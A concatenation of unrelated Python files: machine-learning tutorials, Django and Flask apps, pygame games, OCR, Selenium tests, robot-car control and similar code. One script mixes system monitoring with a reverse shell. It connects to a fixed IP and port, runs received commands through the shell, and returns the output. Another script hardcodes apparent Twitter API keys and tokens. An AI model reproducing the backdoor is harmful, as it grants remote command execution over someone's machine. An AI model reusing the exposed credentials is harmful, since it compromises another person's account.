#ax.scatter(cluster_center[0], cluster_center[1], cluster_center[2],s=10,c='black')
#print cluster_center[0].size
#plt.pause(1e-17)
cluster_members_x.extend(X[my_members, 0])
cluster_members_y.extend(X[my_members, 1])
cluster_members_z.extend(X[my_members, 2])
#print cluster_center_x[k]#,(cluster_center[0])
cluster_center_x[k]=cluster_center[0]
cluster_center_y[k]=cluster_center[1]
cluster_center_z[k]=cluster_center[2]
'''
center_x=cluster_center[0].astype(type('float', (float,), {}))
center_y=cluster_center[1].astype(type('float', (float,), {}))
center_z=cluster_center[2].astype(type('float', (float,), {}))
cluster_center_x.extend(center_x)
cluster_center_y.extend(center_y)
cluster_center_z.extend(center_z)
'''
color_array.extend(color)
#print len(cluster_members_x), len(cluster_center_x)
ax.clear()
ax.set_xlim3d([-1500,1500])
ax.set_ylim3d([-1500,1500])
ax.set_zlim3d([-500,500])
ax.plot(a,b,0,'r')
ax.plot(a,b2,0,'r')
ax.scatter(cluster_members_x, cluster_members_y,cluster_members_z,s=0.5,c=color)
#print cluster_center_x
#print len(cluster_center_x)
#print cluster_centers[:,0]
ax.scatter(cluster_center_x, cluster_center_y, cluster_center_z,s=10,c='black')
plt.pause(1e-17)
'''
ax.clear()
ax.set_xlim3d([-1500,1500])
ax.set_ylim3d([-1500,1500])
ax.set_zlim3d([-500,500])
#ax.scatter(x_all,y_all,z_all,s=2,c='r')
ax.plot(a,b,0,'r')
ax.plot(a,b2,0,'r')
ax.plot(x_mask,y_mask,z_mask,'g.',markersize=0.5)
plt.pause(1e-17)
'''
#break
plt.show()
f.close()
|
print("[*] Position the windows so the text fits niceley inside the window!")
from mss import mss
import cv2
from PIL import Image
import numpy as np
import time
from modules.config import *
x, y = int(screen_resolution.split("x")[0]), int(screen_resolution.split("x")[1])
settings = {"top": int(0.08 * y) + adjust_y, "left":int(x * 0.18) + adjust_x, "width":int(x * 0.7), "height":int(0.25 * y), "mon": monitor_number}
sct = mss()
x_crop = int(x * 0.18)
y_crop = int(y * 0.08)
x_extend_crop = 150#pixels
y_extend_crop = 50#pixels
while True:
sct_img = sct.grab(settings)
img = Image.frombytes('RGB', (sct_img.size.width, sct_img.size.height), sct_img.rgb)
img_bgr = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)
try:
crop_img = img_bgr[10:int(0.08 * y) + y_extend_crop, int(x_crop/2 - x_extend_crop + 80):-int(x_crop/2 + x_extend_crop)].copy()
cv2.imshow('"Whos the imposter?" "Voting Ended" [TEST]"', np.array(crop_img))
cv2.imshow('"Imposter" "Crewmate" "Defeat" "Victory" [TEST]"', np.array(img_bgr))
except Exception as e:
print(f"{e}\nLooks like your x_extend_crop or y_extend_crop values are way too high")
exit()
time.sleep(1) #Helps debugging
#cv2.imshow('Among Us Test', np.array(img_bgr))
if cv2.waitKey(25) & 0xFF == ord('q'):
cv2.destroyAllWindows()
break
|
# Generated by Django 2.0.3 on 2018-03-13 04:11
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('static_pages', '0002_work'),
]
operations = [
migrations.AlterModelOptions(
name='page',
options={'ordering': ['name'], 'verbose_name': 'Страница', 'verbose_name_plural': 'Страницы'},
),
]
|
from email import message
from flask import Flask, render_template, request, redirect
from cs50 import SQL
# from flask_mail import Mail, Message
SPORTS = [
"MMA",
"Cricket",
"Volleyball",
"Skating",
"Dodgeball",
"Karate Kata",
"Dance",
"Chess"
]
db = SQL("sqlite:///data.db")
app = Flask(__name__)
# app.config["MAIL_DEFAULT_SENDER"] = "provide email via OS "
# app.config["MAIL_PASSWORD"] = "bad practice to provide pass word here"
# app.config["MAIL_PORT"] = 587
# app.config["MAIL_SERVER"] = "smtp.gmail.com"
# app.config["MAIL_USE_TLS"] = True
# app.config["MAIL_USERNAME"] = "provide username via OS"
# mail = Mail(app)
@app.route("/")
def index():
return render_template("index.html", sports=SPORTS)
@app.route("/register", methods=["POST"])
def register():
name = request.form.get("name")
email = request.form.get("email")
sport = request.form.get("sport")
errors = []
if not name:
errors.append("name not provided")
if not email:
errors.append("email not provided")
if not sport:
errors.append("sport not selected")
return render_template("failure.html", errors=errors)
if sport not in SPORTS:
errors.append("wrong sport selected")
return render_template("failure.html", errors=errors)
emails = db.execute("SELECT * FROM registrants")
for mail_id in emails:
if email == mail_id["email"]:
return render_template("failure.html", errors=["Email used already"])
db.execute(
"INSERT INTO registrants(name, email, sport) VALUES(?,?,?)", name, email, sport)
# message = Message("You are registered for sports", recipients=[email])
# mail.send(message)
return render_template("success.html", name=name, sport=sport)
@app.route("/entries")
def entries():
return redirect("/registrants")
@app.route("/registrants")
def registrants():
registrants = db.execute("SELECT * FROM registrants")
return render_template("registrants.html", registrants=registrants)
|
# -*- coding: utf-8 -*-
"""
Created on Sun Sep 9 22:19:14 2018
Multiple Linear Regression
Machine Learning A-Z Python
@author: alyam
"""
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('50_Startups.csv')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, 4].values
#Encode the categorical variable which is "state"
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
labelencoder_X = LabelEncoder()
X[:, 3] = labelencoder_X.fit_transform(X[:, 3])
onehotencoder = OneHotEncoder(categorical_features = [3]) #the categorical_features = [3] is the index of the categorical column
X = onehotencoder.fit_transform(X).toarray()
#Avoiding th dummy variable trap
#taking the second column (index 1) to the the last column hence excluding the first column
#Does not have to do it manually since the library is already taking care of it.
#This is just for showing purposes
X = X[:, 1:]
# Splitting the dataset into the Training set and Test set
from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature Scaling
"""from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
sc_y = StandardScaler()
y_train = sc_y.fit_transform(y_train)"""
#Fitting Multiple Linear Regression to the training set
from sklearn.linear_model import LinearRegression
regressor = LinearRegression()
regressor.fit(X_train, y_train)
#Predicting the Test set results
y_pred = regressor.predict(X_test)
"""Building the optimal model using Backward Elimination"""
#the stats model library does not include having a constant for the equation (y-intercept)
#so need to add a column on ones in front of the dataset
import statsmodels.formula.api as sm
X = np.append(arr = np.ones((50,1)).astype(int), values = X, axis = 1) #axis = 1 means adding a column, axis = 0 means adding a row
#Create a new matrix of features which will be our optimal matrix of features
#Step 2 in the slide: fit the full model with all possible predictors
X_opt = X[:, [0, 1, 2, 3, 4, 5]]
regressor_ols = sm.OLS(endog = y, exog = X_opt).fit()
regressor_ols.summary()
#Step 3: Consider the predictor with the highest P-value (which is the P > |t| in the table)
#If P > SL remove the predictor
X_opt = X[:, [0, 1, 3, 4, 5]] #remove x2 that has the highest P-value
regressor_ols = sm.OLS(endog = y, exog = X_opt).fit()
regressor_ols.summary()
"""
#repeat
X_opt = X[:, [0, 3, 4, 5]] #remove x2 that has the highest P-value
regressor_ols = sm.OLS(endog = y, exog = X_opt).fit()
regressor_ols.summary()
"""
|
from riordan_utils import *
from sage.rings.integer import Integer
class AbstractPartitioning:
def colours_table(self):
return NumberedColoursTable()
class IsPrimePartitioning(AbstractPartitioning):
def partition(self, negatives_handling_choice, element):
return negatives_handling_choice.dispatch_on(self, element)
def dispatched_from_IgnoreNegativesChoice(self, choice, element):
return 1 if element.is_prime() else 0
def dispatched_from_HandleNegativesChoice(self, choice, element):
raise Exception("No prime can be negative")
def str_for(self, filename=False, summary=False):
if filename: template = r"is-prime-partitioning"
elif summary: template = r"is prime partitioning"
else: template = 'partitioning'
return template
class RemainderClassesPartitioning(AbstractPartitioning):
def __init__(self, modulo):
self.modulo = modulo
def partition(self, negatives_handling_choice, element):
return negatives_handling_choice.dispatch_on(self, element)
def dispatched_from_IgnoreNegativesChoice(self, choice, element):
return element.mod(self.modulo)
def dispatched_from_HandleNegativesChoice(self, choice, element):
return element.sign(), element.mod(self.modulo)
def str_for(self, filename=False, summary=False):
if filename: template = r"{partitioning}{modulo}-partitioning"
elif summary: template = r"{partitioning}{modulo} partitioning"
else: template = 'partitioning'
return template.format(partitioning="mod", modulo=str(self.modulo))
class MultiplesOfPrimePartitioning(AbstractPartitioning):
def __init__(self, prime):
# if not Integer(prime).is_prime():
# raise ValueError("It is mandatory that the required argument to be a prime.")
self.prime = prime
def partition(self, negatives_handling_choice, element):
return negatives_handling_choice.dispatch_on(self, element)
def dispatched_from_IgnoreNegativesChoice(self, choice, element):
return self.prime.divides(element)
def dispatched_from_HandleNegativesChoice(self, choice, element):
return element.sign(), self.prime.divides(element)
def str_for(self, filename=False, summary=False):
if filename: template = r"multiples-of-{modulo}-partitioning"
elif summary: template = r"multiples of {modulo} partitioning"
else: template = 'partitioning'
return template.format(modulo=str(self.prime))
class PowersOfPrimePartitioning(AbstractPartitioning):
def __init__(self, prime):
self.prime = prime
def partition(self, negatives_handling_choice, element):
return negatives_handling_choice.dispatch_on(self, element)
def dispatched_from_IgnoreNegativesChoice(self, choice, element):
return element.is_power_of(self.prime)
def dispatched_from_HandleNegativesChoice(self, choice, element):
raise Exception('No negative number can be a power of a prime, there'' always -1 in its factorization')
|
import gym
from itertools import count
from collections import deque
from utils import SimpleMemory, preprocess, StatRecorder
env = gym.make('Breakout-v0')
obs = env.reset()
total_steps = 1e3
n_frames = 3
memory = SimpleMemory()
stats = StatRecorder
def get_start_frames(n):
frames = deque(maxlen=n)
for i in range(n):
obs, reward, done, info = env.step(1)
frames.append(preprocess(obs))
return frames
frames = get_start_frames()
current_rewards = 0.0
current_timesteps = 0
for step in count(1):
if step < total_steps:
break
action = env.action_space.sample()
obs, reward, done, info = env.step(action)
current_state = list(frames)
frames.append(preprocess(obs))
if not done:
next_state = list(frames)
else:
next_state = None
memory.append(current_state, action, next_state, reward)
current_rewards += reward
current_timesteps += 1
if done:
stats.rewards.append(current_rewards)
stats.timesteps.append(current_timesteps)
env.reset()
frames = get_start_frames()
print(step)
print('Done')
|
from django.conf.urls import url,include
from .views import *
from django.views.static import serve
from django.conf import settings
from django.conf.urls.static import static
# 张宸豪
urlpatterns = [
# url(r'^book/$', book_views),
url(r'^book/(\d+)$', book_views),
url(r'findpage/$',findpage_views),
]
#廖万林
urlpatterns += [
url(r'^login/$',login_views),
url(r'^register/$',register_views),
# url(r'^peppa/$',peppa_views),
url(r'^captcha/',include('captcha.urls')),
url(r'^testDecorator/$',testDecorator),
url(r'^loginout/$',loginout_views),
]
urlpatterns +=[
url(r'^refund/(\d+)$',refund_views,name='refund'),
url(r'^listrefund/$',listrefund_views),
url(r'showrefund/(\d+)$',showrefund_views,name='showrefund'),
# url(r'^media/(?P<path>.*)$', serve, {'document_root': settings.MEDIA_ROOT}),
]
# + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns +=[
url(r'^sendemail/$',sendEmail,name='sendemail'),
url(r'^checkcode/$',checkcode_views),
url(r'^resetpwd/$',resetpwd_views),
]
# 孙昊
urlpatterns += [
url(r'^index/$', index_views),
url(r'^find/(?P<title>.+)/$', find_views),
]
|
import pygame
import sys
from random import randrange, choice
def terminate(n=None):
if n is None:
pygame.quit()
sys.exit()
else:
pygame.quit()
sys.exit(n)
class Board(pygame.sprite.Sprite):
# Класс для спрайтов брёвен, плывущих по реке
def __init__(self, y, x=0):
super().__init__(all_sprites)
self.add(boards)
self.length = randrange(40, 70)
self.width = 15
self.y = y
self.added = False
# Справа или слева бревно поплывёт
if x != 0:
if x < 0:
self.n = -self.length
else:
self.n = 300
else:
self.n = choice([-self.length, 300])
self.image = pygame.Surface((self.length, self.width),
pygame.SRCALPHA, 32)
pygame.draw.rect(self.image, (73, 19, 13),
(0, 0, self.length, self.width), 0)
self.rect = pygame.Rect((self.n, self.y), (self.length, self.width))
# Выбор скорости, с которой спрайт 'плывёт'
if self.n < 0:
self.vx = randrange(2, 5)
else:
self.vx = -1 * randrange(2, 5)
def update(self):
self.rect.x += self.vx
if ((self.n > 0 and self.rect.x < 160) or
(self.n < 0 and self.rect.x > 140)) and (not self.added):
Board(self.y, self.n)
self.added = True
# Проверка, не выплыл ли спрайт за границы экрана
if not self.rect.colliderect(screen_rect):
# Если да, то с в том же направлении поплывёт новый спрайт
if not self.added:
Board(self.y, self.n)
self.kill()
class Land(pygame.sprite.Sprite):
# Класс для спрайтов земли сверху и снизу
def __init__(self, x):
super().__init__(all_sprites)
self.add(land)
self.image = pygame.Surface((300, 35), pygame.SRCALPHA, 32)
pygame.draw.rect(self.image, (43, 110, 58),
(0, 0, 300, 35), 0)
if x == 0:
self.rect = pygame.Rect(0, 0, 300, 35)
else:
self.rect = pygame.Rect(0, 365, 300, 35)
class Gamer(pygame.sprite.Sprite):
# Класс для спрайта игрока
def __init__(self):
super().__init__(all_sprites)
self.add(gamer)
self.image = pygame.Surface((14, 14), pygame.SRCALPHA, 32)
pygame.draw.circle(self.image, (255, 0, 0),
(7, 7), 7, 0)
self.rect = pygame.Rect((150 - 7, 400 - 29), (14, 14))
def update(self, *kp):
global game_over
if len(kp) > 0:
# Передвижение игрока
if kp[0] == pygame.K_LEFT:
self.rect.x += -20
if kp[0] == pygame.K_UP:
self.rect.y += -30
if kp[0] == pygame.K_RIGHT:
self.rect.x += 20
if kp[0] == pygame.K_DOWN:
self.rect.y += 30
m = pygame.sprite.spritecollideany(self, land)
n = pygame.sprite.spritecollideany(self, boards)
if m is None and n is None:
game_over = True
print('game over')
elif m == land.sprites()[0]:
# Окончание игры, если игрок дошёл до конца
print('win')
end_screen()
terminate(1)
elif n:
# Если игрок стоит на бревне, то его скорость равна скорости бревна
self.rect.x += n.vx
def start_screen():
# Рисуется начальный экран
screen.fill((255, 255, 255))
intro_text = ["Cross the river", "",
"Правила миниигры:",
"Тебе необходимо добраться до",
"другой стороны реки по брёвнам,",
"для этого используй стрелки.",
"Нажми на какую-нибудь клавишу",
"или кнопку, чтобы начать игру"]
font = pygame.font.Font(None, 22)
text_coord = 50
for line in intro_text:
string_rendered = font.render(line, True, pygame.Color('black'))
intro_rect = string_rendered.get_rect()
text_coord += 10
intro_rect.top = text_coord
intro_rect.x = 10
text_coord += intro_rect.height
screen.blit(string_rendered, intro_rect)
while True:
for ev in pygame.event.get():
if ev.type == pygame.QUIT:
terminate()
elif ev.type == pygame.KEYDOWN or \
ev.type == pygame.MOUSEBUTTONDOWN:
return
pygame.display.flip()
clock.tick(5)
def end_screen():
# Рисуется конечный экран
screen.fill((255, 255, 255))
intro_text = ["Ты успешно прошёл миниигру!",
"Нажми на какую-нибудь клавишу",
"или кнопку, чтобы выйти"]
font = pygame.font.Font(None, 22)
text_coord = 50
for line in intro_text:
string_rendered = font.render(line, True, pygame.Color('black'))
intro_rect = string_rendered.get_rect()
text_coord += 10
intro_rect.top = text_coord
intro_rect.x = 10
text_coord += intro_rect.height
screen.blit(string_rendered, intro_rect)
while True:
for ev in pygame.event.get():
if ev.type == pygame.QUIT:
terminate()
elif ev.type == pygame.KEYDOWN or \
ev.type == pygame.MOUSEBUTTONDOWN:
return
pygame.display.flip()
clock.tick(5)
pygame.init()
pygame.display.set_caption('Cross the river')
size = 300, 400
screen = pygame.display.set_mode(size)
screen.fill((255, 255, 255))
clock = pygame.time.Clock()
running = True
game_over = True
screen_rect = (0, 0, 300, 400)
while running:
if game_over:
# Объявляются группы спрайтов и др для начала игры
start_screen()
all_sprites = pygame.sprite.Group()
land = pygame.sprite.Group()
boards = pygame.sprite.Group()
gamer = pygame.sprite.Group()
Land(0)
Land(1)
for i in range(2, 13):
Board(400 - i * 30)
Gamer()
game_over = False
for event in pygame.event.get():
if event.type == pygame.QUIT:
terminate()
if event.type == pygame.KEYDOWN:
gamer.update(event.key)
screen.fill((40, 35, 245))
boards.update()
gamer.update()
all_sprites.draw(screen)
gamer.draw(screen)
pygame.display.flip()
clock.tick(8)
|
import cv2
import numpy as np
import os
import imutils
import pytesseract
suduku_arr = [[0 for _ in range(9)] for _ in range(9)]
def detect_entire_block(filename):
img=cv2.imread(filename,0)
edges=cv2.Canny(img,100,200)
cnts = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
cnts = imutils.grab_contours(cnts)
cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:10]
screenCnt = None
for c in cnts:
peri = cv2.arcLength(c, True)
approx = cv2.approxPolyDP(c, 0.015 * peri, True)
if len(approx) == 4:
screenCnt = approx
break
x,y,w,h = cv2.boundingRect(screenCnt)
crop_img = img[y:y+h,x:x+w]
get_sep_block(crop_img, True)
def get_sep_block(img, itter, prefix=None):
height, width = img.shape[:2]
x = 0
y = 0
h = height // 3
w = width // 3
for i in range(3):
for j in range(3):
crop_img = img[y:y+h,x:x+w]
offset = 8
height, width = crop_img.shape[:2]
crop_img = crop_img[offset:height-offset, offset:width-offset]
if itter:
new_file = "cv_"+str(prefix)+"_"+str(i)+str(j)+"_1.png"
else:
new_file = "cv_"+str(prefix)+"_"+str(i)+str(j)+"_0.png"
if itter:
get_sep_block(crop_img, False, prefix=str(i)+str(j))
else:
block_x = int(prefix)//10 * 3 + i
block_y = int(prefix)%10 * 3 + j
get_value_from_img(crop_img, block_x, block_y)
x += w
x = 0
y += h
def get_value_from_img(img, x, y):
text = pytesseract.image_to_string(img, lang='eng',
config='--psm 6 -c tessedit_char_whitelist=0123456789').strip()
if not text:
text = "0"
suduku_arr[x][y] = int(text)
if __name__ == "__main__":
detect_entire_block('images/sudoku_01.jpg')
for i in suduku_arr:
print(i)
|
import unittest
from _feature_objects.feature_screen import DevicesScreen
from _feature_objects.feature_left_menu import *
from _pages.pageLogin import LoginPage
from _pages.pageMain import MainPage
from selenium import webdriver
class SmokeTest(unittest.TestCase):
driver = None #global variable
@classmethod
def setUpClass(cls):
print ("\n" + "TEST SUITE: Smoke test (Suite ID: )")
cls.driver = webdriver.Chrome()
login_page = LoginPage(cls.driver)
login_page.open_page()
main_page = login_page.login()
main_page.check_main_page_loaded()
def setUp(self):
main_page = MainPage(self.driver)
main_page._close_popups()
def test_01_delete_devices_from_the_console(self):
devices = Variables.devices_for_smoke_test
left_menu = BaseLeftMenu(self.driver)
left_menu_devices = LeftMenuDevices(self.driver)
devices_page = DevicesScreen(self.driver)
left_menu.open_menu_devices()
left_menu_devices.expand_global_site_view_list()
left_menu_devices.click_global_site_view_label()
# left_menu.click_site_in_global_site_view_list(sitename)
devices_page.delete_devices_in_devices_page_table(devices)
# @unittest.skip
# def test_install_vrep(self):
# pass
#
# @unittest.skip
# def test_apply_vrep(self):
# pass
#
# @unittest.skip
# def test_install_mresponder(self):
# pass
#
# @unittest.skip
# def test_install_forceresident(self):
# pass
def test_02_create_new_site(self):
print ("\n" + "TC#9101. Create new site with acceptable name")
sitename = Variables.site_for_smoke_test
site_name_popup = SiteNamePopup(self.driver)
left_menu_devices = LeftMenuDevices(self.driver)
ribbon_bar = RibbonBar(self.driver)
left_menu_devices.delete_site_if_exists(sitename)
left_menu_devices = LeftMenuDevices(self.driver)
left_menu_devices.click_global_site_view_label()
ribbon_bar.click_button_new_site()
site_name_popup.enter_text_into_name_text_field(sitename)
site_name_popup.click_button_ok()
self.assertTrue(left_menu_devices.check_site_is_in_global_site_view_list(sitename))
print ("TEST PASSED" + "\n")
'''D0 NOT DELETE!!!'''
# def test_add_vrep_to_the_console(self):
# name = "VKYV-DT-IK"
# main_page = MainPage(self.driver)
# devices_page = DevicesScreen(self.driver)
# x = DownloadAndInstall(self.driver)
# main_page.delete_device_from_the_console()
# x.clean_up_device()
# x.download_agent()
# x.install_agent()
# devices_page.click_icon_refresh()
# devices_page.check_device_is_presented(name)
# @unittest.skip
# def test_apply_vrep_to_site(self):
# pass
#
# @unittest.skip
# def test_lock_devices_to_site(self):
# pass
#
# @unittest.skip
# def test_create_discovery_task(self):
# pass
#
# @unittest.skip
# def test_create_devices_groups(self):
# pass
#
# @unittest.skip
# def test_create_patches_group(self):
# pass
# def tearDown(self):
# page = MainPage(self.driver)
# page._close_popups()
@classmethod
def tearDownClass(cls):
cls.driver.quit()
if __name__ == "__main__":
unittest.main(verbosity=2)
|
import os.path as p
import glob
from pathlib import Path
from typing import List, Tuple
import numpy as np
import faiss
from SimSent.indexer.faiss_cache import faiss_cache
__all__ = ['BaseIndexHandler']
class BaseIndexHandler(object):
DiffScores = List[np.float32]
VectorIDs = List[np.int64]
FaissSearch = Tuple[DiffScores, VectorIDs]
def __init__(self):
self.index = None
self.dynamic = False
self.io_flag = faiss.IO_FLAG_ONDISK_SAME_DIR
@faiss_cache(128)
def search(self, query_vector: np.array, k: int) -> FaissSearch:
return self.index.search(query_vector, k)
def get_index_paths(self, idx_dir_pth: Path,
nested: bool = False) -> List[Path]:
get = '*/*.index' if nested else '*.index'
index_paths = glob.glob(p.abspath(idx_dir_pth/get))
index_paths = [Path(pth) for pth in index_paths if # Skip empty indexes
faiss.read_index(pth, self.io_flag).ntotal > 0]
return sorted(index_paths)
@staticmethod
def joint_sort(scores: DiffScores, ids: VectorIDs) -> FaissSearch:
"""
Sorts scores in ascending order while maintaining score::id mapping.
Checks if input is already sorted.
:param scores: Faiss query/hit vector L2 distances
:param ids: Corresponding faiss vector ids
:return: Scores sorted in ascending order with corresponding ids
"""
# Check if sorted
if all(scores[i] <= scores[i + 1] for i in range(len(scores) - 1)):
return scores, ids
# Joint sort
sorted_difs, sorted_ids = (list(sorted_dif_ids) for sorted_dif_ids
in zip(*sorted(zip(scores, ids))))
return sorted_difs, sorted_ids
|
from flask import Flask, request, jsonify
import json
app = Flask("__name__")
@app.route("/index", methods=["POST", "GET"])
def req():
return jsonify({"code": 0, "msg": "hello word"})
if __name__ == '__main__':
app.run(host="0.0.0.0", port=8000)
|
import tweepy
consumer_key = "P5wTozEUuNOAJCXMajGnRcDs2"
consumer_secret = "RB7p2JVEZxbodmRT3eaA32caonxpo5fS5DOKXcoTxEKJelTZys"
access_token = "997065391644917761-mSZZ6gkTdLEOdDSOAFfu7clvJO4vQPq"
access_token_secret = "MoAMNPZeAmYMwtjaopDrAs1njCwmx9pdCmC7JBP0A1uxF"
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
public_tweets = api.home_timeline()
for tweet in public_tweets:
print(tweet.text)
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pathlib import PurePath
import pytest
from pants.backend.terraform.hcl2_parser import resolve_pure_path
def test_resolve_pure_path() -> None:
assert resolve_pure_path(PurePath("foo/bar/hello/world"), PurePath("../../grok")) == PurePath(
"foo/bar/grok"
)
assert resolve_pure_path(
PurePath("foo/bar/hello/world"), PurePath("../../../../grok")
) == PurePath("grok")
with pytest.raises(ValueError):
resolve_pure_path(PurePath("foo/bar/hello/world"), PurePath("../../../../../grok"))
assert resolve_pure_path(PurePath("foo/bar/hello/world"), PurePath("./grok")) == PurePath(
"foo/bar/hello/world/grok"
)
|
from django.contrib import admin
from patients.models import Patient, RegisteredPatient, NotRegisteredPatient
# Register your models here.
admin.site.register(Patient)
admin.site.register(RegisteredPatient)
admin.site.register(NotRegisteredPatient)
|
import numpy as np
import torch
def target_distribution(name):
w1 = lambda z: torch.sin(2 * np.pi * z[:, 0] / 4)
w2 = lambda z: 3 * torch.exp(-0.5 * ((z[:, 0] - 1) / 0.6) ** 2)
w3 = lambda z: 3 * torch.sigmoid((z[:, 0] - 1) / 0.3)
if name == "1":
u = lambda z: 0.5 * ((torch.norm(z, p=2, dim=1) - 2) / 0.4)**2 - \
torch.log(torch.exp(-0.5*((z[:,0] - 2) / 0.6)**2) + torch.exp(-0.5*((z[:,0] + 2) / 0.6)**2) + 1e-10)
elif name == "2":
u = lambda z: 0.5 * ((z[:,1] - w1(z)) / 0.4)**2
elif name == "3":
u = lambda z: - torch.log(torch.exp(-0.5*((z[:,1] - w1(z))/0.35)**2) + torch.exp(-0.5*((z[:,1] - w1(z) + w2(z))/0.35)**2) + 1e-10)
elif name == "4":
u = lambda z: - torch.log(torch.exp(-0.5*((z[:,1] - w1(z))/0.4)**2) + torch.exp(-0.5*((z[:,1] - w1(z) + w3(z))/0.35)**2) + 1e-10)
return u
|
import socket
import os
import subprocess
import psutil
import time
import threading
from queue import Queue
import wmi
from datetime import datetime, timedelta
NUMBER_OF_THREADS = 2
JOB_NUMBER = [1, 2]
queue = Queue()
system_data = {"HostName": "", "UpTime": "", "CPU": ""}
def host_name():
host_name = socket.gethostname()
system_data["HostName"] = host_name
def get_cpu():
while True:
cpu_utilization = psutil.cpu_percent(interval=1)
system_data["CPU"] = cpu_utilization
def get_uptime():
c = wmi.WMI()
while True:
for os in c.Win32_OperatingSystem():
time = os.LastBootUpTime.split('.')[0]
last_boot_time = datetime.strptime(time, '%Y%m%d%I%M%S')
now = datetime.now()
uptime = now - last_boot_time
system_data["UpTime"] = uptime
def run_command():
s = socket.socket()
host = '10.42.62.156'
port = 9999
s.connect((host, port))
while True:
data = s.recv(1028)
if data[:2].decode("utf-8") == 'cd':
os.chdir(data[3:].decode("utf-8"))
if len(data) > 0:
cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
output_byts = cmd.stdout.read() + cmd.stderr.read()
output_str = str(output_byts, "utf-8")
s.send(str.encode(output_str + str(os.getcwd()) + "> "))
print(output_str)
s.close()
def create_worker():
for _ in range(NUMBER_OF_THREADS):
t = threading.Thread(target=work)
t.daemon = True
t.start()
# Do the next Job in Queue (1 to handle connection 2 to send commands)
def work():
while True:
x = queue.get()
if x == 1:
host_name()
get_cpu()
get_uptime()
if x == 2:
run_command()
queue.task_done()
# Each list item is a new JOB
def create_jobs():
for x in JOB_NUMBER:
queue.put(x)
queue.join()
create_worker()
create_jobs()
|
#-*- coding: utf-8 -*-
print('''n = 123,
f = 456.789,
s1 = 'hello,world',
s2 = 'hello, \\\'Adam\\\'\'
s3 = r'Hello,"Bart"'
s4 = r\'\'\'Hello,
Lisa!\'\'\'
''')
s1 = 'n = 123'
s2 = 'f = 456.789'
s3 = 's2 = \'hello, \\\'Adam\\\'\''
print(s3)
print('''line1
line2
line3''')
|
import pygame
import time
pygame.init()
# initialize the joystick
pygame.joystick.init()
joystick = pygame.joystick.Joystick(0)
joystick.init()
axes = joystick.get_numaxes()
while True:
for i in range(axes):
# print out the axis values
axis = joystick.get_axis(i)
#s = 'Axis i: ' + axis
print 'Axis %d:\t%6.4f' % (i, axis)
#time.sleep(0.25)
|
#! /usr/bin/python
# coding=utf-8
import time
import select
import sys
import os
import RPi.GPIO as GPIO
import numpy as np
import picamera
import picamera.array
from picamera import PiCamera
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import time
import cv2
import math
import threading
from car import Car
from infrad import Infrad
from lane_lines import *
from detect import *
from ultrasonic import *
car = Car()
inf = Infrad()
ul = Ultrasound()
camera = PiCamera()
def find_left(car, GO):
car.set_speed(-100, 100)
time.sleep(0.15)
if GO:
car.set_speed(50, 50)
else:
car.set_speed(0, 0)
def find_right(car, GO):
car.set_speed(100, -100)
time.sleep(0.15)
if GO:
car.set_speed(50, 50)
else:
car.set_speed(0, 0)
def rush_left(car, GO):
car.set_speed(-200, 200)
time.sleep(0.1)
if GO:
car.set_speed(50, 50)
else:
car.set_speed(0, 0)
def rush_right(car, GO):
car.set_speed(-200, 200)
time.sleep(0.2)
if GO:
car.set_speed(50, 50)
else:
car.set_speed(0, 0)
def set_slow(car, GO):
car.set_speed(-80, -80)
time.sleep(0.25)
car.set_speed(-160, 160)
time.sleep(0.2)
if GO:
car.set_speed(50, 50)
else:
car.set_speed(0, 0)
def set_forward(car, GO):
if GO:
car.set_speed(50, 50)
else:
car.set_speed(0, 0)
def stage_detect(image_in):
image = filter_colors(image_in)
gray = grayscale(image)
blur_gray = gaussian_blur(gray, kernel_size)
edges = canny(blur_gray, low_threshold, high_threshold)
imshape = image.shape
vertices = np.array([[\
((imshape[1] * (1 - trap_bottom_width)) // 2, imshape[0]),\
((imshape[1] * (1 - trap_top_width)) // 2, imshape[0] - imshape[0] * trap_height),\
(imshape[1] - (imshape[1] * (1 - trap_top_width)) // 2, imshape[0] - imshape[0] * trap_height),\
(imshape[1] - (imshape[1] * (1 - trap_bottom_width)) // 2, imshape[0])]]\
, dtype=np.int32)
masked_edges = region_of_interest(edges, vertices)
img = masked_edges
min_line_len = min_line_length
lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)
if lines is None:
return None
line_img = np.zeros((*img.shape, 3), dtype=np.uint8) # 3-channel RGB image
newlines = draw_lines(line_img, lines)
for line in newlines:
if line[1] < line[3]:
line[0], line[1], line[2], line[3] = line[2], line[3], line[0], line[1]
if newlines[0][0] > newlines[1][0]:
newlines[0], newlines[1] = newlines[1], newlines[0]
return(newlines)
def ros(lane, car, GO):
left, right, nl, nr = lane
left_ans = True if left else False
right_ans = True if right else False
new_left = True if nl else False
new_right = True if nr else False
# print(str(left_ans) + ", " + str(right_ans) + ", " + str(new_left) + ', ' + str(new_right))
if left_ans and right_ans and new_left and new_right:
set_forward(car, GO)
elif not left_ans and right_ans and new_left and new_right:
find_right(car, GO)
elif not right_ans and left_ans and new_left and new_right:
find_left(car, GO)
elif not new_left and new_right:
rush_left(car, GO)
elif not new_right and new_left:
rush_right(car, GO)
elif not new_left and not new_right:
set_slow(car, GO)
def LEDframe():
global STOP
rawCapture = picamera.array.PiRGBArray(camera)
for frame in camera.capture_continuous(rawCapture, format='bgr', use_video_port=True):
image = frame.array
print(image.shape)
image = image.reshape((640, 480, 3))
rawCapture.truncate(0)
